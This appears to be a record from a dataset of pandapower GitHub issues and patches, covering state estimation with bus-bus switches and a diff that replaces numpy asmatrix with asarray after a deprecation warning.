pp.create_load(net, 2, .250, .100)

# Create a bb-switch; the parallel line 2 will be short-circuited (ignored)
pp.create_switch(net, 1, element=2, et='b')

net_meas_on_bb_bus = deepcopy(net)
net_switch_as_impedance = deepcopy(net)
net_switch_as_impedance.switch.at[0, "closed"] = False
net_switch_as_impedance.line.at[2, 'length_km'] /= 1000
net_switch_as_impedance_with_meas = deepcopy(net_switch_as_impedance)

pp.runpp(net)
pp.runpp(net_meas_on_bb_bus)
pp.runpp(net_switch_as_impedance)
pp.runpp(net_switch_as_impedance_with_meas)


def create_test_measurement(net, measurement_on_bb_switch_bus=False):
    pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[0], .004), .004, element=0)
    pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[1], .004), .004, element=1)
    pp.create_measurement(net, "v", "bus", r2(net.res_bus.vm_pu.iloc[3], .004), .004, element=3)
    pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[3], .002), .004, element=3)
    pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[3], .002), .004, element=3)

    # If a measurement sits on a bus with an activated bb-switch, it will influence the results of the merged bus
    if measurement_on_bb_switch_bus:
        pp.create_measurement(net, "p", "bus", -r2(net.res_bus.p_mw.iloc[2], .002), .004, element=2)
        pp.create_measurement(net, "q", "bus", -r2(net.res_bus.q_mvar.iloc[2], .002), .004, element=2)

    pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[0], .001), .002, 0, side='from')
    pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[0], .001), .002, 0, side='from')
    pp.create_measurement(net, "p", "line", r2(net.res_line.p_from_mw.iloc[1], .001), .002, 1, side='from')
    pp.create_measurement(net, "q", "line", r2(net.res_line.q_from_mvar.iloc[1], .001), .002, 1, side='from')
    pp.create_measurement(net, "p", "trafo", r2(net.res_trafo.p_hv_mw.iloc[0], .002), .01, side="hv", element=0)  # transformer meas.
    pp.create_measurement(net, "q", "trafo", r2(net.res_trafo.q_hv_mvar.iloc[0], .002), .01, side=3, element=0)  # at hv side (bus 3)

create_test_measurement(net)
create_test_measurement(net_switch_as_impedance)
create_test_measurement(net_meas_on_bb_bus, True)
create_test_measurement(net_switch_as_impedance_with_meas, True)

# 2. Do state estimation
success_net = se(net, tolerance=1e-5, maximum_iterations=20)
success_net_meas_on_bb_bus = se(net_meas_on_bb_bus, tolerance=1e-5, maximum_iterations=20)
success_net_with_impedance = se(net_switch_as_impedance, tolerance=1e-5, maximum_iterations=20)
success_impedance_with_meas = se(net_switch_as_impedance_with_meas, tolerance=1e-5, maximum_iterations=20)

res_bus_with_switch = net.res_bus_est
res_bus_meas_on_bb_bus = net_meas_on_bb_bus.res_bus_est
res_bus_small_impedance = net_switch_as_impedance.res_bus_est
res_bus_small_impedance_with_meas = net_switch_as_impedance_with_meas.res_bus_est
```

The network has the following variations:

- original
- bb: using a bb-switch between buses 1 and 2
- imp: using a small impedance instead of the bb-switch between buses 1 and 2
- bb+meas: using a bb-switch, with p, q measurements on one of the switched buses
- imp+meas: using a small impedance, with p, q measurements on one of the buses

P_mw injections on buses:

| bus id | Original | bb | imp | bb+meas | imp+meas |
|--|--|--|--|--|--|
| 0 | 0.35 | 0.35 | 0.35 | 0.43 | 0.35 |
| 1 | 0.45 | 0.7 | 0.05 | 0.62 | 0.45 |
| 2 | 0.25 | 0.7 | 0.65 | 0.62 | 0.25 |
| 3 | -1.09 | -1.09 | -1.08 | -1.09 | -1.08 |

From the results, the small-impedance variant with measurements delivers the best estimate. If the network contains a bb-switch, the state estimation module fails to distinguish the affected buses, since they are automatically merged into one bus in the ppc (the merge can be verified with the lookup sketch below).
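As an editorial aside: a quick way to confirm the bus fusing described above is to inspect pandapower's internal bus lookup after a power flow. This is a minimal sketch; `_pd2ppc_lookups` is an internal attribute that may change between versions, and `net` refers to the four-bus network from the snippet above.

```python
import pandapower as pp

pp.runpp(net)  # net: the four-bus network with the closed bb-switch
bus_lookup = net._pd2ppc_lookups["bus"]  # maps pandapower bus index -> ppc bus index
# buses 1 and 2 are fused through the closed bb-switch, so they share one ppc bus
assert bus_lookup[1] == bus_lookup[2]
print(bus_lookup[:4])
```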
I am thinking of a possible fix for the issue with minimal changes to the original process. Since the root cause is that, on the ppci level, multiple measurements (and also loads and sgens) are fused together onto one single bus, my idea is to identify such a cluster (ppci bus) through the many-to-one bus mapping and to use auxiliary buses in clusters with multiple devices, so that the code adjustment stays minimal (steps 1-3 are sketched in code below):

1. If a cluster has more than one bus with devices, add auxiliary buses for all buses except the first one (to avoid generating a bus with zero p, q) to substitute the original buses in the ppci cluster.
2. Set all bb-switches on the original buses to out of service and add auxiliary bb-switches on the newly added buses with the same configuration.
3. Add lines with small impedance between the auxiliary buses and the buses they substitute.
4. Run the normal state estimation.
5. Remove all auxiliary buses, bb-switches and lines, and restore the in_service state of the original bb-switches.
6. Remove the state estimation results of the auxiliary elements.

The results will thus map correctly onto the original configuration.
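To make steps 1-3 concrete, here is a minimal sketch for a single bus in a fused cluster. The helper name and the impedance values are illustrative assumptions, not existing pandapower internals; `pp.create_impedance` stands in for the short line used in the issue's workaround, and cluster detection is left out.

```python
import pandapower as pp

def add_auxiliary_bus(net, bus, switch):
    """Hypothetical helper: detach `bus` from its bb-switch cluster and
    reattach it through an auxiliary bus plus a small impedance (steps 1-3)."""
    # step 1: auxiliary bus substitutes the original bus inside the ppci cluster
    aux_bus = pp.create_bus(net, vn_kv=net.bus.at[bus, "vn_kv"], name="aux_%d" % bus)
    # step 2: open the original bb-switch and mirror its configuration on the aux bus
    other = (net.switch.at[switch, "element"]
             if net.switch.at[switch, "bus"] == bus
             else net.switch.at[switch, "bus"])
    net.switch.at[switch, "closed"] = False
    aux_switch = pp.create_switch(net, aux_bus, element=other, et="b")
    # step 3: connect the original bus to the aux bus through a small impedance
    aux_imp = pp.create_impedance(net, bus, aux_bus, rft_pu=1e-6, xft_pu=1e-6, sn_mva=1.)
    return aux_bus, aux_switch, aux_imp
```

After the estimation run, steps 5-6 would drop `aux_bus`, `aux_switch`, and `aux_imp` again and restore the original switch state.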
2019-01-04T10:59:54
e2nIEE/pandapower
275
e2nIEE__pandapower-275
[ "273" ]
cf19dec15bc699ea4ca2d8a19e6fa9702a2c8414
diff --git a/pandapower/pf/dSbus_dV_pypower.py b/pandapower/pf/dSbus_dV_pypower.py
--- a/pandapower/pf/dSbus_dV_pypower.py
+++ b/pandapower/pf/dSbus_dV_pypower.py
@@ -12,7 +12,7 @@
 """Computes partial derivatives of power injection w.r.t. voltage.
 """
 
-from numpy import conj, diag, asmatrix, asarray, zeros
+from numpy import conj, diag, asarray
 from scipy.sparse import issparse, csr_matrix as sparse
 
 
@@ -39,11 +39,11 @@ def dSbus_dV_sparse(Ybus, V):
 
 def dSbus_dV_dense(Ybus, V):
     # standard code from Pypower (slower than above)
-    Ibus = Ybus * asmatrix(V).T
+    Ibus = Ybus * asarray(V).T
 
-    diagV = asmatrix(diag(V))
-    diagIbus = asmatrix(diag(asarray(Ibus).flatten()))
-    diagVnorm = asmatrix(diag(V / abs(V)))
+    diagV = asarray(diag(V))
+    diagIbus = asarray(diag(asarray(Ibus).flatten()))
+    diagVnorm = asarray(diag(V / abs(V)))
     dS_dVm = diagV * conj(Ybus * diagVnorm) + conj(diagIbus) * diagVnorm
     dS_dVa = 1j * diagV * conj(diagIbus - Ybus * diagV)
Deprecation warning for asmatrix

The usage of numpy asmatrix raises deprecation warnings in numpy 1.15.4:

PendingDeprecationWarning: the matrix subclass is not the recommended way to represent matrices or deal with linear algebra (see https://docs.scipy.org/doc/numpy/user/numpy-for-matlab-users.html). Please adjust your code to use regular ndarray.

There are 5 occurrences in pandapower/pf/dSbus_dV_pypower.py.
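A minimal reproduction of the warning, assuming numpy >= 1.15 (PendingDeprecationWarning is silenced by default, so a filter is needed to see it). The last lines illustrate the usual migration caveat: `*` is matrix multiplication on `np.matrix` but elementwise on ndarrays, so ports away from `asmatrix` typically switch products to `@` or `.dot`.

```python
import warnings
import numpy as np

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    M = np.asmatrix(np.eye(2))  # constructing np.matrix emits the warning on numpy >= 1.15
print([w.category.__name__ for w in caught])  # contains 'PendingDeprecationWarning'

# ndarray replacement: use @ where np.matrix relied on * for matrix products
A = np.asarray(np.eye(2))
v = np.asarray([1.0, 2.0])
print(A * v)  # elementwise with broadcasting
print(A @ v)  # true matrix-vector product
```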
2019-01-24T15:46:38